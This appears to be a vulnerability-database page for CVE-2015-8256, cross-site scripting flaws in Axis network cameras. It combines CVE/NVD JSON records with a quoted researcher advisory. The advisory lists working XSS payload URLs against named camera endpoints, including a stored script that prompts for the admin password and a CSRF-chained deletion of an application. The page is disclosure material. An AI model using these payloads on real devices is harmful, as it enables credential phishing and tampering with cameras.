CVE-2015-8256 (GCVE-0-2015-8256)
Vulnerability from cvelistv5 – Published: 2017-04-17 16:00 – Updated: 2024-08-06 08:13
VLAI?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T08:13:32.101Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"name": "39683",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"name": "97699",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/97699"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-04-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-04-18T09:57:01",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"name": "39683",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"name": "97699",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/97699"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2015-8256",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"name": "39683",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"name": "97699",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/97699"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2015-8256",
"datePublished": "2017-04-17T16:00:00",
"dateReserved": "2015-11-19T00:00:00",
"dateUpdated": "2024-08-06T08:13:32.101Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2015-8256\",\"sourceIdentifier\":\"cret@cert.org\",\"published\":\"2017-04-17T16:59:00.150\",\"lastModified\":\"2025-04-20T01:37:25.860\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.\"},{\"lang\":\"es\",\"value\":\"M\u00faltiples vulnerabilidad XSS en camaras Axis network.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:axis:network_camera_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A0DF2A88-D86A-4B29-9701-F42D588DD65D\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:cannon_network_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F988ABAB-7A62-44B6-BBA7-E079350FFA5A\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:explosion-protected_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A02A4019-B82C-45B2-8E3F-422B6793CE80\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:fixed_box_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"687F10FE-3833-4097-B36D-E103F1513FB6\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:fixed_bullet_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B5C685BB-6B80-4FD6-92B0-399251BD72E8\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:fixed_dome_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3FCAC47B-A1A8-45D6-A6CF-9A106CBFFDF5\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:modular_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"337DD1DE-CD3E-413E-90EB-4A65F0E122E8\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:onboard_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6C06CE35-E785-44CA-B79D-F0F15AECF7F5\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:panoramic_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E644403-BFFC-4E4C-81BF-C9426094D862\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:ptz_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C3D7324F-3DF6-48F1-BF6D-0E884F3549AE\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:axis:thermal_camera:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B41E47D3-D2D0-47B1-B748-B8E665AF0984\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html\",\"source\":\"cret@cert.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securityfocus.com/bid/97699\",\"source\":\"cret@cert.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.exploit-db.com/exploits/39683/\",\"source\":\"cret@cert.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securityfocus.com/bid/97699\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.exploit-db.com/exploits/39683/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]}]}}"
}
}
VAR-201704-0284
Vulnerability from variot - Updated: 2025-04-20 23:29Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. I.
technical details
** STORED XSS
1 Attacker injects a javascript payload in the vulnerable page (using
some social enginner aproach):
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=
This will generate an error like this on page:
" Error processing XML: Incorrect formatting line number 2, column 60: <error type = "No_such_application" message = "No application" '' ----------------------------------------------------------------^ "
and also will create a entry in the genneral log file (/var/log/messages) with the JSPayload:
" Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find application '' "
When the user is viewing the log 'system options' -> 'support' -> 'Logs & Reports': http://{axishost}/axis-cgi/admin/systemlog.cgi?id
the JSPayload will be interpreted by the browser and the Javascript prompt method will be executed showing a prompt asking user for the password ('AXIS_PASSWORD').
- With this vector an attacker is able to perfome many attacks using javascript, for example to hook users browser, capture users cookie, performe pishing attacks etc.
However, due to CSRF presented is even possible to perform all actions already presented: create, edit and remove users and applications, etc. For example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=
A reflected cross-site scripting affects all models of AXIS devices on the same parameter: http:// {axis-cam-model}/view/view.shtml?imagePath=0WLLalert('AXIS-XSS')<!--
Other Vectors
http:// {axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<!--
http://{axishost}/admin-bin/editcgi.cgi?file=alert(1)
http:// {axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http:// {axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis
alert(1)Show details on source websiteSCRIPTPATHS:
{HTMLROOT}/showReport.shtml {HTMLROOT}/config.shtml {HTMLROOT}/incl/top_incl.shtml {HTMLROOT}/incl/popup_header.shtml {HTMLROOT}/incl/page_header.shtml {HTMLROOT}/incl/top_incl_popup.shtml {HTMLROOT}/viewAreas.shtml {HTMLROOT}/vmd.shtml {HTMLROOT}/custom_whiteBalance.shtml {HTMLROOT}/playWindow.shtml {HTMLROOT}/incl/ptz_incl.shtml {HTMLROOT}/view.shtml {HTMLROOT}/streampreview.shtml
Impact
allows to run arbitrary code on a victim's browser and computer if combined with another flaws in the same devices.
solution
It was not provided any solution to the problem.
Credits
The vulnerability has been discovered by SmithW from OrwellLabs
Legal Notices
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs ++++++++++++++++ doublethinking..
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-0284",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "network camera",
"scope": "eq",
"trust": 1.6,
"vendor": "axis",
"version": null
},
{
"model": "network camera",
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": "communications network cameras",
"scope": "eq",
"trust": 0.3,
"vendor": "axis",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:axis:network_camera_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SmithW from OrwellLabs",
"sources": [
{
"db": "BID",
"id": "97699"
}
],
"trust": 0.3
},
"cve": "CVE-2015-8256",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2015-8256",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-86217",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2015-8256",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-8256",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-8256",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-863",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-86217",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. I. \n\ntechnical details\n-----------------\n** STORED XSS\n\n\n# 1 Attacker injects a javascript payload in the vulnerable page (using\nsome social enginner aproach):\n\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get\u0026name=\u003cscript\ntype=\"text/javascript\u003eprompt(\"AXIS_PASSWORD:\")\u003c/script\u003e\n\nThis will generate an error like this on page:\n\n\"\nError processing XML: Incorrect formatting\nline number 2, column 60:\n\u003cerror type = \"No_such_application\" message = \"No application\" \u0027\u003cscript\ntype=\"text/javascript\u003eprompt(\"AXIS_PASSWORD:\")\u003c/script\u003e\u0027\n----------------------------------------------------------------^\n\"\n\nand also will create a entry in the genneral log file (/var/log/messages)\nwith the JSPayload:\n\n\"\n\u003cINFO \u003e Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find\napplication \u0027\u003cscript\ntype=\"text/javascript\u003eprompt(\"AXIS_PASSWORD:\")\u003c/script\u003e\u0027\n\"\n\nWhen the user is viewing the log \u0027system options\u0027 -\u003e \u0027support\u0027 -\u003e \u0027Logs \u0026\nReports\u0027:\nhttp://{axishost}/axis-cgi/admin/systemlog.cgi?id\n\nthe JSPayload will be interpreted by the browser and the Javascript prompt\nmethod will be executed showing a prompt asking user for the password\n(\u0027AXIS_PASSWORD\u0027). \n\n* With this vector an attacker is able to perfome many attacks using\njavascript, for example to hook users browser, capture users cookie,\nperforme pishing attacks etc. \n\nHowever, due to CSRF presented is even possible to perform all actions\nalready presented: create, edit and remove users and applications, etc. For\nexample, to delete an application \"axis_update\" via SXSS:\n\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get\u0026name=\u003cscript src=\"http://\naxishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml\"\u003e\u003c/script\u003e\n\n\nA reflected cross-site scripting affects all models of AXIS devices on the\nsame parameter:\nhttp://\n{axis-cam-model}/view/view.shtml?imagePath=0WLL\u003c/script\u003e\u003cscript\u003ealert(\u0027AXIS-XSS\u0027)\u003c/script\u003e\u003c!--\n\n# Other Vectors\nhttp://\n{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E\n\nhttp://{axishost}/view/custom_whiteBalance.shtml?imagePath=\u003cimg src=\"xs\"\nonerror=alert(7) /\u003e\u003c!--\nhttp://{axishost}/admin-bin/editcgi.cgi?file=\u003cscript\u003ealert(1)\u003c/script\u003e\n\nhttp://\n{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E\n\nhttp://\n{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp\u0026pageTitle=axis\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cpre\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n\n# SCRIPTPATHS:\n\n{HTMLROOT}/showReport.shtml\n{HTMLROOT}/config.shtml\n{HTMLROOT}/incl/top_incl.shtml\n{HTMLROOT}/incl/popup_header.shtml\n{HTMLROOT}/incl/page_header.shtml\n{HTMLROOT}/incl/top_incl_popup.shtml\n{HTMLROOT}/viewAreas.shtml\n{HTMLROOT}/vmd.shtml\n{HTMLROOT}/custom_whiteBalance.shtml\n{HTMLROOT}/playWindow.shtml\n{HTMLROOT}/incl/ptz_incl.shtml\n{HTMLROOT}/view.shtml\n{HTMLROOT}/streampreview.shtml\n\n\nImpact\n------\nallows to run arbitrary code on a victim\u0027s browser and computer if combined\nwith another flaws in the same devices. \n\nsolution\n--------\nIt was not provided any solution to the problem. \n\nCredits\n-------\nThe vulnerability has been discovered by SmithW from OrwellLabs\n\nLegal Notices\n-----------------\nThe information contained within this advisory is supplied \"as-is\" with no\nwarranties or guarantees of fitness of use or otherwise. I accept no\nresponsibility for any damage caused by the use or misuse of this\ninformation. \n\n\nAbout Orwelllabs\n++++++++++++++++\ndoublethinking..",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8256"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "PACKETSTORM",
"id": "141674"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-86217",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-8256",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "141674",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "39683",
"trust": 1.7
},
{
"db": "BID",
"id": "97699",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863",
"trust": 0.7
},
{
"db": "SEEBUG",
"id": "SSVID-91665",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-86217",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"id": "VAR-201704-0284",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:29:43.640000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30ab\u30e1\u30e9",
"trust": 0.8,
"url": "https://www.axis.com/ja/techsup/cam_servers/index.htm"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/141674/axis-network-camera-cross-site-scripting.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/97699"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8256"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8256"
},
{
"trust": 0.3,
"url": "https://www.axis.com/in/en/"
},
{
"trust": 0.1,
"url": "http://{axishost}/admin-bin/editcgi.cgi?file=\u003cscript\u003ealert(1)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "http://{axishost}/axis-cgi/admin/systemlog.cgi?id"
},
{
"trust": 0.1,
"url": "http://{axishost}/axis-cgi/vaconfig.cgi?action=get\u0026name=\u003cscript"
},
{
"trust": 0.1,
"url": "http://{axishost}/view/custom_whitebalance.shtml?imagepath=\u003cimg"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-17T00:00:00",
"db": "VULHUB",
"id": "VHN-86217"
},
{
"date": "2017-04-17T00:00:00",
"db": "BID",
"id": "97699"
},
{
"date": "2017-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"date": "2017-03-17T00:08:43",
"db": "PACKETSTORM",
"id": "141674"
},
{
"date": "2017-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"date": "2017-04-17T16:59:00.150000",
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-25T00:00:00",
"db": "VULHUB",
"id": "VHN-86217"
},
{
"date": "2017-04-18T00:07:00",
"db": "BID",
"id": "97699"
},
{
"date": "2017-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"date": "2017-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AXIS Network camera cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
